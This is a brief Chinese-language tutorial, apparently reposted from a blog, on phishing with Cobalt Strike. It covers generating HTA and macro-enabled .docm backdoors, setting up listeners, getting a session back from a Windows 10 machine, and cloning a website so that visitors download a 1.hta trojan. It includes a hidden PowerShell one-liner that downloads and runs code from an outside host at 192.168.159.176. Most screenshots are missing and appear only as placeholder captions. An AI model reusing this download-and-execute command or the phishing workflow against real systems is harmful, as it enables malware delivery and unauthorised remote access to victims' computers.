Cobalt Strike钓鱼

生成后门
hta后门
宏病毒
Cobalt Strike钓鱼_第1张图片
新建监听器
Cobalt Strike钓鱼_第2张图片
Cobalt Strike钓鱼_第3张图片

将生成的文件放入win10执行成功返回会话

宏病毒
Cobalt Strike钓鱼_第4张图片

新建监听器
Cobalt Strike钓鱼_第5张图片
Cobalt Strike钓鱼_第6张图片
输入宏病毒代码在保存成可执行宏的后缀名docm

钓鱼攻击

web管理
Cobalt Strike钓鱼_第7张图片
Cobalt Strike钓鱼_第8张图片
这里的web管理模块可以看到客户端的历史记录

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.159.176:80/a’))”

克隆网站下载执行木马
设置需要下载的文件
Cobalt Strike钓鱼_第9张图片
Cobalt Strike钓鱼_第10张图片

Cobalt Strike钓鱼_第11张图片
开始克隆网站
Cobalt Strike钓鱼_第12张图片
Cobalt Strike钓鱼_第13张图片

当用户开始访问http://192.168.159.176/1就会下载1.hta文件

你可能感兴趣的:(安全,网络安全)